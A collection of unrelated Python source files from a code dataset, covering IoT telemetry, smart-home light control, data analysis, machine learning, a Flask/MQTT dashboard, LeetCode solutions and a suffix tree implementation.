diff = 0.1\n global ThingSpeak_unreportedChange\n global door_lastReportedValue\n global field6_str\n if abs(data-door_lastReportedValue) >= diff: \n ThingSpeak_unreportedChange = True\n door_lastReportedValue = data\n data = '%.2f' % data\n field6_str = '&field6=%s' % (data)\n publishMqttDisplay(\"The Door on your boat just opened!\")\n \n\n##################################################################\n# Other functions\n##################################################################\n\ndef startwith(line,tag):\n if tag in line[0:9]:\n return True\n else:\n return False\n\ndef send2ThingSpeak():\n global ThingSpeak_reportingCounter\n global ThingSpeak_unreportedChange\n global field1_str\n global field2_str\n global field3_str\n global field4_str\n global field5_str\n global field6_str\n global field7_str\n global field8_str\n global baseURL\n \"\"\"\n field1_str = ''\n field2_str = ''\n field3_str = ''\n field4_str = ''\n field5_str = ''\n field6_str = ''\n field7_str = ''\n field8_str = ''\n \"\"\"\n \n # Somethings has to be sent and we did not just send\n # or it was long since we sent something\n if (( ThingSpeak_unreportedChange and ThingSpeak_reportingCounter >= 100) or \\\n ( ThingSpeak_reportingCounter >= 1*36)):\n # Sending the data to thingspeak\n field_str = field1_str + field2_str + \\\n field3_str + field4_str + \\\n field5_str + field6_str + \\\n field7_str + field8_str\n\n config = getConfig()\n\n # URL where we will send the data, Don't change it\n baseURL = config.ThingSpeak_BaseURL + 'api_key=%s' % config.ThingSpeak_Write_API_key\n\n print(baseURL + field_str )\n conn = urlopen(baseURL + field_str ) # change from str1 to str to publish all\n print('ThingSpeak publish entry: ' + str(conn.read().decode()))\n # Closing the connection\n conn.close()\n ThingSpeak_unreportedChange = False\n ThingSpeak_reportingCounter = 0\n \n##################################################################\nif __name__ == \"__main__\":\n startit()\n","sub_path":"IoT_CAN/RaspberryPi/IoT_Can_v1.1.4.py","file_name":"IoT_Can_v1.1.4.py","file_ext":"py","file_size_in_byte":13015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"280351635","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom Blinker.Blinker import Blinker, BlinkerButton, BlinkerNumber, BlinkerMiot\nfrom Blinker.BlinkerConfig import *\nfrom Blinker.BlinkerDebug import *\n\nauth = 'Your Device Secret Key'\n\nBLINKER_DEBUG.debugAll()\n\nBlinker.mode('BLINKER_WIFI')\nBlinker.miType('BLINKER_MIOT_LIGHT') # BLINKER_MIOT_LIGHT 灯, BLINKER_MIOT_OUTLET 插座, BLINKER_MIOT_MULTI_OUTLET 多口插座, BLINKER_MIOT_SENSOR 传感器\nBlinker.begin(auth)\n\nbutton1 = BlinkerButton('btn-abc')\nnumber1 = BlinkerNumber('num-abc')\n\ncounter = 0\nwsState = 'on'\nwsMode = BLINKER_CMD_COMMON\n\ndef miotPowerState(state):\n ''' '''\n\n BLINKER_LOG('need set power state: ', state)\n\n wsState = state and 'on' or 'off'\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.print()\n\ndef miotColor(color):\n ''' '''\n\n BLINKER_LOG('need set color: ', color)\n\n # if color == 'Red':\n # # your codes\n # elif color == 'Yellow':\n # # your codes\n # elif color == 'Blue':\n # # your codes\n # elif color == 'Green':\n # # your codes\n # elif color == 'White':\n # # your codes\n # elif color == 'Black':\n # # your codes\n # elif color == 'Cyan':\n # # your codes\n # elif color == 'Purple':\n # # your codes\n # elif color == 'Orange':\n # # your codes\n\n BlinkerMiot.color(color)\n BlinkerMiot.print()\n\ndef miotMode(mode):\n ''' '''\n\n BLINKER_LOG('need set mode: ', mode)\n\n # if mode == BLINKER_CMD_MIOT_READING:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_MOVIE:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_SLEEP:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_HOLIDAY:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_MUSIC:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_COMMON:\n # # Your mode function\n\n BlinkerMiot.mode(mode)\n BlinkerMiot.print()\n\ndef miotcMode(cmode):\n ''' '''\n\n BLINKER_LOG('need cancel mode: ', cmode)\n\n # if mode == BLINKER_CMD_MIOT_READING:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_MOVIE:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_SLEEP:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_HOLIDAY:\n # # Your mode function\n # elif mode == BLINKER_CMD_Miot_MUSIC:\n # # Your mode function\n # elif mode == BLINKER_CMD_MIOT_COMMON:\n # # Your mode function\n\n BlinkerMiot.mode(cMode)\n BlinkerMiot.print()\n\ndef miotBright(bright):\n ''' '''\n\n BLINKER_LOG('need set brightness: ', bright)\n\n BlinkerMiot.brightness(bright)\n BlinkerMiot.print()\n\n\ndef miotColorTemp(colorTemp):\n ''' '''\n\n BLINKER_LOG('need set colorTemperature: ', colorTemp)\n\n BlinkerMiot.colorTemp(colorTemp)\n BlinkerMiot.print()\n\n# 0xFF0000: # 'red'\n# 0xFFFF00: # 'yellow'\n# 0x0000FF: # 'blue'\n# 0x00FF00: # 'green'\n# 0xFFFFFF: # 'white'\n# 0x000000: # 'black'\n# 0x00FFFF: # 'cyan'\n# 0x800080: # 'purple'\n# 0xFFA500: # 'orange'\ncolorMap = {'red':0xFF0000, 'green':0x00FF00, 'blue':0x0000FF}\n\ndef _getCurColor():\n current_color = 'red'\n return colorMap.get(current_color)\n\ndef miotQuery(queryCode):\n ''' '''\n\n BLINKER_LOG('Miot Query codes: ', queryCode)\n\n if queryCode == BLINKER_CMD_QUERY_ALL_NUMBER :\n BLINKER_LOG('Miot Query All')\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.color(_getCurColor())\n BlinkerMiot.mode(wsMode)\n BlinkerMiot.colorTemp(50)\n BlinkerMiot.brightness(100)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_POWERSTATE_NUMBER :\n BLINKER_LOG('Miot Query Power State')\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_COLOR_NUMBER :\n BLINKER_LOG('Miot Query Color')\n BlinkerMiot.color('red')\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_MODE_NUMBER :\n BLINKER_LOG('Miot Query Mode')\n BlinkerMiot.mode(wsMode)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_COLORTEMP_NUMBER :\n BLINKER_LOG('Miot Query ColorTemperature')\n BlinkerMiot.colorTemp(50)\n BlinkerMiot.print()\n elif queryCode == BLINKER_CMD_QUERY_BRIGHTNESS_NUMBER :\n BLINKER_LOG('Miot Query Brightness')\n BlinkerMiot.brightness(100)\n BlinkerMiot.print()\n else :\n BlinkerMiot.powerState(wsState)\n BlinkerMiot.color('red')\n BlinkerMiot.mode(wsMode)\n BlinkerMiot.colorTemp(50)\n BlinkerMiot.brightness(100)\n BlinkerMiot.print()\n\ndef button1_callback(state):\n ''' '''\n\n BLINKER_LOG('get button state: ', state)\n\n button1.icon('icon_1')\n button1.color('#FFFFFF')\n button1.text('Your button name or describe')\n button1.print(state)\n\ndef data_callback(data):\n global counter\n \n BLINKER_LOG('Blinker readString: ', data)\n counter += 1\n number1.print(counter)\n\nbutton1.attach(button1_callback)\nBlinker.attachData(data_callback)\n\nBlinkerMiot.attachPowerState(miotPowerState)\nBlinkerMiot.attachColor(miotColor)\nBlinkerMiot.attachMode(miotMode)\nBlinkerMiot.attachCancelMode(miotcMode)\nBlinkerMiot.attachBrightness(miotBright)\nBlinkerMiot.attachColorTemperature(miotColorTemp)\nBlinkerMiot.attachQuery(miotQuery)\n\nif __name__ == '__main__':\n\n while True:\n Blinker.run()\n","sub_path":"example/Blinker_Miot/Miot_LIGHT/Miot_LIGHT.py","file_name":"Miot_LIGHT.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333232739","text":"import openpyxl\n# import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\npath = './聚类结果.xlsx'\nwb = openpyxl.load_workbook(path)\nsh = wb['Sheet2']\ndata_dhl = []\n\n最大供货量 = []\n订单次数 = []\n完成率 = []\n平均供货量 = []\n\nfor row in list(sh.rows)[1:376]:\n 最大供货量.append(row[3].value)\n 订单次数.append(row[4].value)\n 完成率.append(row[5].value)\n 平均供货量.append(row[6].value)\n\n# print(最大供货量)\n\nB_最大供货量 = []\nB_订单次数 = []\nB_完成率 = []\nB_平均供货量 = []\n\nfor i in range(0, 374):\n tp1, tp2, tp3, tp4 = [], [], [], []\n # print(i, len(tp1))\n for j in range(0, 374):\n # print('i = ', i, ' j = ', j)\n tp1.append(最大供货量[i] / 最大供货量[j])\n tp2.append(订单次数[i] / 订单次数[j])\n tp3.append(完成率[i] / 完成率[j])\n tp4.append(平均供货量[i] / 平均供货量[j])\n pass\n # print('tp1 len = ', len(tp1))\n B_最大供货量.append(tp1)\n B_订单次数.append(tp2)\n B_完成率.append(tp3)\n B_平均供货量.append(tp4)\n","sub_path":"层次分析法/生成B矩阵.py","file_name":"生成B矩阵.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392940155","text":"import pymunk\nfrom pymunk.vec2d import Vec2d\n\nimport random\nimport time\n\nfrom shapes.blob import Blob\n\n\nclass ATP(Blob):\n def __init__(self, parent_cell, init_position=Vec2d(0.0, 0.0)):\n super().__init__(\n init_position=init_position,\n init_mass=1,\n init_moment=100,\n init_radius=1,\n move_force=0.1,\n growth_factor=1,\n )\n self.parent_cell = parent_cell\n\n def time_step(self):\n self.move()\n if random.random() < 0.1:\n self.change_dir_ask()\n","sub_path":"cell/cell_component/atp.py","file_name":"atp.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576889968","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport eventlet\nfrom sys import float_info\nfrom argparse import ArgumentParser\n\nfrom flask import Flask, jsonify, render_template\nfrom flask_cors import CORS\nfrom flask_mqtt import Mqtt\nfrom flask_socketio import SocketIO\n\nfrom config.env import env\nfrom ams import Waypoint, Arrow, Intersection, Target, Topic\nfrom ams.nodes import SimTaxi, SimTaxiUser, SimTaxiFleet, TrafficSignal, User, Vehicle, FleetManager\n# from ams.messages import FleetStatus\n\nfrom pprint import PrettyPrinter\npp = PrettyPrinter(indent=2).pprint\n\nparser = ArgumentParser()\nparser.add_argument(\"-W\", \"--path_waypoint_json\", type=str,\n default=\"../../res/waypoint.json\", help=\"waypoint.json path\")\nparser.add_argument(\"-A\", \"--path_arrow_json\", type=str,\n default=\"../../res/arrow.json\", help=\"arrow.json path\")\nparser.add_argument(\"-I\", \"--path_intersection_json\", type=str,\n default=\"../../res/intersection.json\", help=\"intersection.json path\")\nargs = parser.parse_args()\n\neventlet.monkey_patch()\n\napp = Flask(__name__)\nwith app.app_context():\n app.waypoint = Waypoint()\n app.waypoint.load(args.path_waypoint_json)\n app.arrow = Arrow()\n app.arrow.load(args.path_arrow_json)\n app.intersection = Intersection()\n app.intersection.load(args.path_intersection_json)\n\n app.topics = {}\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, SimTaxiUser.__name__), None)\n topic.set_categories(User.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"user\"] = topic.get_path(use_wild_card=True)\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, SimTaxi.__name__), None)\n topic.set_categories(Vehicle.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"vehicle\"] = topic.get_path(use_wild_card=True)\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, SimTaxiFleet.__name__), None)\n topic.set_categories(FleetManager.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"fleet_manager\"] = topic.get_path(use_wild_card=True)\n\n topic = Topic()\n topic.set_targets(Target.new_target(None, TrafficSignal.__name__), None)\n topic.set_categories(TrafficSignal.CONST.TOPIC.CATEGORIES.STATUS)\n app.topics[\"traffic_signal\"] = topic.get_path(use_wild_card=True)\n\n pp(app.topics)\n\nCORS(app)\n\napp.config['MQTT_BROKER_URL'] = env[\"MQTT_BROKER_HOST\"]\napp.config['MQTT_BROKER_PORT'] = int(env[\"MQTT_BROKER_PORT\"])\n# app.config['MQTT_KEEPALIVE'] = 5\n# app.config['MQTT_TLS_ENABLED'] = False\nmqtt = Mqtt(app)\n\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\n\ndef api_response(code=200, message=None):\n if message is None:\n response = jsonify({})\n else:\n response = jsonify(message)\n response.status_code = code\n return response\n\n\n@app.route('/')\ndef root():\n for topic in app.topics.values():\n mqtt.subscribe(topic)\n return render_template(\"index.html\", title=\"ams\", name=\"test_name\")\n\n\n@app.route(\"/getViewData\")\ndef get_view_data():\n waypoint_ids = app.waypoint.get_waypoint_ids()\n waypoints = {}\n arrows = app.arrow.get_arrows()\n lat_min, lng_min = float_info.max, float_info.max\n lat_max, lng_max = 0.0, 0.0\n for waypoint_id in waypoint_ids:\n lat, lng = app.waypoint.get_latlng(waypoint_id)\n lat_min = min(lat_min, lat)\n lat_max = max(lat_max, lat)\n lng_min = min(lng_min, lng)\n lng_max = max(lng_max, lng)\n waypoints[waypoint_id] = {\n \"geohash\": app.waypoint.get_geohash(waypoint_id),\n \"position\": dict(zip([\"x\", \"y\", \"z\"], app.waypoint.get_xyz(waypoint_id)))\n }\n return api_response(code=200, message={\n \"viewPoint\": {\n \"lat\": 0.5*(lat_max + lat_min),\n \"lng\": 0.5*(lng_max + lng_min)},\n \"waypoints\": waypoints,\n \"arrows\": arrows,\n \"topics\": app.topics\n })\n\n\n@app.route(\"/requestFleetRelations\")\ndef request_fleet_relations():\n # topic = Topic()\n # topic.set_root(FleetManager.TOPIC.SUBSCRIBE)\n # topic.set_message(fleet_manager_message)\n # message = topic.get_template()\n # message[\"action\"] = FleetManager.ACTION.PUBLISH_RELATIONS\n # mqtt.publish(topic.root, topic.serialize(message))\n return api_response(code=200, message={\"result\": \"requested\"})\n\n\n@socketio.on('message')\ndef handle_message(message):\n print(\"handle_message\", message)\n\n\n@mqtt.on_topic(app.topics[\"user\"])\ndef handle_mqtt_on_user_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"user\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\n@mqtt.on_topic(app.topics[\"vehicle\"])\ndef handle_mqtt_on_vehicle_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"vehicle\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\n@mqtt.on_topic(app.topics[\"traffic_signal\"])\ndef handle_mqtt_on_traffic_signal_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"traffic_signal\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\n@mqtt.on_topic(app.topics[\"fleet_manager\"])\ndef handle_mqtt_on_fleet_manager_status_message(_client, _userdata, mqtt_message):\n message = mqtt_message.payload.decode(\"utf-8\")\n socketio.emit(\n app.topics[\"fleet_manager\"], data={\"topic\": mqtt_message.topic, \"message\": message}, namespace=\"/ams\")\n\n\nif __name__ == '__main__':\n socketio.run(app, host=env[\"AMS_HOST\"], port=int(env[\"AMS_PORT\"]), use_reloader=True, debug=True)\n","sub_path":"examples/sim_taxi/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145972487","text":"import pandas as pd\nimport numpy as np\nfrom typing import Tuple, List\n\n\ndef split_data(data: pd.DataFrame, last: int,\n next_columns: bool = True) -> Tuple[List[pd.DataFrame], pd.DataFrame]:\n\n time_depended = [\n np.array(data[[f\"Pay{k:02d}\", f\"Open{k:02d}\"]]) for k in range(last)]\n time_depended = np.swapaxes(np.array(time_depended), 0, 1)\n \n age_column = [\"age\",]\n age = data[[\"age\", ]] / data.age.max()\n\n lob = pd.get_dummies(data.LoB)\n lob_columns = [f\"LoB{k}\" for k in range(lob.shape[1])]\n\n inj_part = pd.get_dummies(data.inj_part)\n inj_part_columns = [f\"inj_part{k}\" for k in range(inj_part.shape[1])]\n\n static = pd.concat([age, lob, inj_part], axis=1)\n static.columns = age_column + lob_columns + inj_part_columns\n\n next_col = None\n if next_columns:\n next_col = data[[f\"Pay{last:02d}\", f\"Open{last:02d}\"]]\n\n return [static.values, time_depended], next_col.values\n","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"422098484","text":"import pandas as pd\nimport numpy as np\nimport tqdm\nimport utils.preprocess as utils\n\n# Get submission header\ncol_names = list(pd.read_csv(filepath_or_buffer='data/sample_submission.csv', nrows=1).columns)\nnum_classes = len(col_names) - 1\n\n# Get test data\n_train, test, _y_tgt, _train_cols = utils.prep_data()\n\n# Get test ids\nobject_ids = test[['object_id']].values.astype(np.int32)\nnum_ids = object_ids.size\n\n# RS bins\nrs_bins = test['rs_bin'].values.astype(np.int32)\n\n# Standard binary bin probing probabilities\nP = [\n 0.1,\n 0.3,\n 0.5,\n 0.7,\n]\n\n# List of pair probes\npairs = [\n (99, 90),\n (95, 92),\n (88, 67),\n (65, 64),\n (62, 53),\n (52, 42),\n (52, 42),\n (16, 15),\n (99, 6),\n]\n\n# Class vector\nclasses = [\n 99,\n 95,\n 92,\n 90,\n 88,\n 67,\n 65,\n 64,\n 62,\n 53,\n 52,\n 42,\n 16,\n 15,\n 6,\n]\nclasses = classes[::-1]\n\nfor tgt_class, comp_class in tqdm.tqdm(pairs, total=len(pairs)):\n\n bin_num = 0 # Galactic bin\n\n tgt_class_col = classes.index(tgt_class) # Col of class being probed with prob p on bin_num, 1-p elsewhere\n comp_class_col = classes.index(comp_class) # Col of class being probed with prob 1-p on bin_num, p elsewhere\n\n for i, p in tqdm.tqdm(enumerate(P), total=len(P)):\n\n probs = np.zeros((num_ids, num_classes))\n probs[rs_bins == bin_num, tgt_class_col] = p\n probs[rs_bins != bin_num, tgt_class_col] = 1-p\n probs[:,comp_class_col] = 1 - probs[:,tgt_class_col]\n sub = np.hstack([object_ids, probs])\n\n h = ''\n for s in col_names:\n h += s + ','\n h = h[:-1]\n\n # Write to file\n np.savetxt(\n fname=f'./subs_freq_probe/c{tgt_class}_c{comp_class}_p{p:.2f}.csv',\n X=sub,\n fmt=['%d']+['%.1f']*num_classes,\n delimiter=',',\n header=h,\n comments='',\n )","sub_path":"utils/create_freq_probe_subs.py","file_name":"create_freq_probe_subs.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402339973","text":"# coding: utf-8\n# Pima Indians Diabets Prediction Model\n# Model Fitting\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras.layers import Dense\n\n# 1. load training/test data\ndataset = np.loadtxt(\"./dataset/pimaindians-diabetes.csv\", delimiter=\",\")\nx = dataset[:, 0:8]\nt = dataset[:, 8]\n\n# 2. model frame config\nmodel = Sequential()\nmodel.add(Dense(50, input_dim=8, activation='relu'))\n# model.add(Dense(8, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n# 3. model fitting environment\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# 4. model fitting\nhistory = model.fit(x, t, epochs=200, batch_size=10)\n\n# 5. training loss\ntrain_loss = history.history['loss']\n\n# 6. 그래프로 표현\nxlen = np.arange(len(train_loss))\nplt.plot(xlen, train_loss, marker='.', c=\"blue\", label='train loss')\nplt.show()\n\n# 5. result\nresult = model.evaluate(x, t, verbose=0)\nprint(f'\\n (Loss, Accuracy) = ({result[0]}, {result[1]})')\n\n# 6. predict\nx = np.array([[6, 148, 72, 35, 0, 33.6, 0.627, 50]])\npredict_y = model.predict(x)\npercentage = float(predict_y[0]) * 100.\nprint(f'\\n당뇨병 발병률: {percentage:.2f}%')\n","sub_path":"04.deep-learning/03.tensorflow-keras-practice/01.pimaindians-diabetes/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144037927","text":"\"\"\"\nfile: ejercicio3.py\n@ricardoifc\n\"\"\"\nnumeroEstudiante = input(\"ingrese el número de estudiantes\\t\")\nnumeroEstudiante = int(numeroEstudiante)\ncadena = \"\"\n\ncontador = 1\npromedioTotal = 0\nvalorPormedioTotal=0\n\nwhile contador <= numeroEstudiante:\n\tnombre = input(\"ingrese su nombre\\t\")\n\tapellido = input(\"ingrese su apellido\\t\")\n\tnota = input(\"ingrese una nota\\t\")\n\tnota2 = input(\"ingrese una nota2\\t\")\n\n\tnota = float(nota)\n\tnota2 = float(nota2)\n\n\tpromedio = (nota + nota2)/2\n\tpromedioTotal = promedio + promedioTotal\n\n\tcadena = \"%s%s %s, con notas:\\n%f\\n%f\\ntiene un promedio de %f\\n\" % \\\n\t(cadena, nombre, apellido, nota, nota2, promedio)\n\tcontador = contador + 1\n\nnumeroEstudiante = float(numeroEstudiante)\nvalorPormedioTotal = promedioTotal / numeroEstudiante\ncadena = \"%sEl promedio del curso es %f\" % (cadena, valorpromedioTotal)\nprint(cadena)","sub_path":"Python/2do ciclo/04 while cadena +/practica200519-ricardoifc-master/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"122321809","text":"\"\"\"\nThere are n different online courses numbered from 1 to n. Each course has some duration(course length) t and closed on dth day. A course\nshould be taken continuously for t days and must be finished before or on the dth day. You will start at the 1st day.\n\nGiven n online courses represented by pairs (t,d), your task is to find the maximal number of courses that can be taken.\n\nExample:\n\nInput: [[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]\nOutput: 3\nExplanation: \nThere're totally 4 courses, but you can take 3 courses at most:\nFirst, take the 1st course, it costs 100 days so you will finish it on the 100th day, and ready to take the next course on the 101st day.\nSecond, take the 3rd course, it costs 1000 days so you will finish it on the 1100th day, and ready to take the next course on the\n1101st day. \nThird, take the 2nd course, it costs 200 days so you will finish it on the 1300th day. \nThe 4th course cannot be taken now, since you will finish it on the 3300th day, which exceeds the closed date.\n\nNote:\n The integer 1 <= d, t, n <= 10,000.\n You can't take two courses simultaneously.\n\"\"\"\nimport heapq\nclass Solution:\n def scheduleCourse(self, courses):\n \"\"\"\n :type courses: List[List[int]]\n :rtype: int\n \"\"\"\n courses.sort(key=lambda t: t[1])\n taken, time = [], 0\n for c in courses: \n if c[0] + time <= c[1]:\n time += c[0]\n heapq.heappush(taken, -c[0])\n elif taken and -taken[0] > c[0]:\n time = time + heapq.heappop(taken) + c[0]\n heapq.heappush(taken, -c[0])\n return len(taken)\n\n # still slow\n def scheduleCourse_(self, courses):\n \"\"\"\n :type courses: List[List[int]]\n :rtype: int\n \"\"\"\n def schedule(cur, index, date):\n if index == len(courses): return len(cur)\n \n if courses[index][0] + date <= courses[index][1]:\n return schedule(cur+[courses[index][0]], index+1, date+courses[index][0])\n else:\n for i in range(len(cur)-1, -1, -1):\n if cur[i] >= courses[index][0]:\n tmp = cur[i]\n cur[i] = courses[index][0]\n return schedule(cur, index+1, date-tmp+cur[i])\n return schedule(cur, index+1, date)\n\n if not courses: return 0\n courses.sort(key=lambda k: k[1])\n return schedule([], 0, 0)\n \n def scheduleCourse_(self, courses):\n \"\"\"\n :type courses: List[List[int]]\n :rtype: int\n \"\"\"\n def schedule(mem, index, date):\n if index == len(courses): return 0\n if mem[index][date] is not None:\n return mem[index][date]\n cur = schedule(mem, index+1, date)\n if courses[index][0] + date <= courses[index][1]:\n cur = max(cur, schedule(mem, index+1, date+courses[index][0])+1)\n mem[index][date] = cur\n return cur\n\n if not courses: return 0\n courses.sort(key=lambda k: k[1])\n mem = [[None] * courses[-1][1] for _ in range(len(courses))]\n return schedule(mem, 0, 0)\n\ns = Solution()\nprint(s.scheduleCourse([[100, 200], [200, 1300], [1000, 1250], [2000, 3200]]))\n","sub_path":"leetcode/courseSchedule/solutionIII.py","file_name":"solutionIII.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"36195660","text":"'''\r\nForm 96xN pickle file if the path spectrogram and midi files are given\r\n'''\r\n\r\n\r\n\r\n'''\r\nMake pickle for Image data\r\n\r\n'''\r\n\r\nimport numpy as np\r\nimport pickle\r\nimport natsort\r\nimport os\r\nimport cv2\r\n\r\npickImagepath=r'**Enter path'\r\nimageFiles=[]\r\nfor d in os.listdir(pickImagepath):\r\n imageFiles.append(os.path.join(pickImagepath, d))\r\n\r\nimageFiles = natsort.natsorted(imageFiles,reverse=False)\r\ninput_data = np.array([])\r\n\r\nfor i in range(len(imageFiles)):\r\n img = cv2.imread(imageFiles[i],1)\r\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n gray = np.transpose(gray)\r\n if i==0:\r\n input_data=gray\r\n else: \r\n input_data = np.concatenate((input_data, gray), axis=0)\r\n \r\n \r\n\r\nf = open(r'xx.pckl', 'wb')\r\npickle.dump(input_data, f)\r\nf.close()\r\nprint(input_data.shape)\r\n####################################################################################################################################\r\n'''\r\nMake pickle for Midi data\r\n\r\n'''\r\npickMidipath=r'**Enter path'\r\nmidiFiles=[]\r\nfor d in os.listdir(pickMidipath):\r\n midiFiles.append(os.path.join(pickMidipath, d))\r\n\r\nmidiFiles = natsort.natsorted(midiFiles,reverse=False)\r\ninput_data = np.array([])\r\n\r\nfor i in range(len(midiFiles)):\r\n img = cv2.imread(midiFiles[i],1)\r\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n gray = np.transpose(gray)\r\n if i==0:\r\n input_data=gray\r\n else: \r\n input_data = np.concatenate((input_data, gray), axis=0)\r\n \r\n \r\nf = open(r'yy.pckl', 'wb')\r\npickle.dump(input_data, f)\r\nf.close()\r\nprint(input_data.shape)\r\n\r\n","sub_path":"dataset_creation/makePickle.py","file_name":"makePickle.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391694079","text":"\"\"\" This file contains a suffix array generator.\r\nThe suffix array is obtained by building a suffix tree (with ukkonen's algorithm) then traversing it.\r\n\"\"\"\r\n\r\nimport sys\r\n\r\n\r\nclass Node:\r\n ALPHABET_OFFSET = 97\r\n\r\n def __init__(self, node_id=None, alpha_size=26):\r\n \"\"\" Default alphabet set includes ASCII characters a - z, with special terminal symbol $ \"\"\"\r\n self.edges = [None] * (alpha_size + 1)\r\n self.leaf = True\r\n self.id = node_id\r\n\r\n def get_edge(self, character):\r\n \"\"\" Given a character, returns edge that links up to the corresponding child node \"\"\"\r\n return self.edges[Node.calc_index(character)]\r\n\r\n def connect(self, character, text_start, text_end, node_id):\r\n \"\"\" Adds a new edge that links up to another node corresponding to character specified \"\"\"\r\n new_node = Node(node_id)\r\n new_edge = Edge(text_start, text_end, new_node)\r\n self.edges[Node.calc_index(character)] = new_edge\r\n self.leaf = False\r\n\r\n def set_id(self, new_id):\r\n self.id = new_id\r\n\r\n def get_id(self):\r\n return self.id\r\n\r\n def is_leaf(self):\r\n return self.leaf\r\n\r\n def set_not_leaf(self):\r\n self.leaf = False\r\n\r\n @staticmethod\r\n def calc_index(char):\r\n \"\"\" Given a character, returns its corresponding index for the edges array \"\"\"\r\n return 0 if char == \"$\" else ord(char) - Node.ALPHABET_OFFSET + 1\r\n\r\n\r\nclass Edge:\r\n def __init__(self, text_start, text_end, next_node):\r\n self.text = text_start, text_end\r\n self.next = next_node\r\n\r\n def __len__(self):\r\n return self.text[1].get_end() - self.text[0] + 1\r\n\r\n def next_node(self):\r\n return self.next\r\n\r\n def insert(self, character, insert_point):\r\n \"\"\" Breaks an edge into two by inserting a new node in the middle\r\n and returns the internal node. Original substring represented by\r\n two nodes and one edge becomes three nodes and two edges.\r\n\r\n :time complexity: O(1)\r\n \"\"\"\r\n old_node = self.next\r\n remaining_edge = Edge(insert_point + 1, self.text[1], old_node)\r\n self.update_text(self.text[0], End(insert_point)) # shortens old edge\r\n\r\n # links internal node with the remaining edge\r\n internal_node = Node()\r\n internal_node.set_not_leaf()\r\n internal_node.edges[Node.calc_index(character)] = remaining_edge\r\n self.next = internal_node\r\n\r\n return self.next\r\n\r\n def get_text(self):\r\n return self.text\r\n\r\n def update_text(self, text_start, text_end):\r\n \"\"\" Typically used for shortening an edge \"\"\"\r\n self.text = text_start, text_end\r\n\r\n\r\nclass End:\r\n def __init__(self, end):\r\n self.end = end\r\n\r\n def increment_end(self):\r\n self.end += 1\r\n\r\n def decrement_end(self):\r\n self.end -= 1\r\n\r\n def get_end(self):\r\n return self.end\r\n\r\n\r\nclass Tree:\r\n def __init__(self, ref_text=\"\"):\r\n self.root = Node()\r\n self.ref_text = ref_text + \"$\"\r\n self.global_end = End(-1)\r\n\r\n def get_root(self):\r\n return self.root\r\n\r\n def get_edge(self, active_node, txt_ptr):\r\n \"\"\" Gets an edge of the node that corresponds 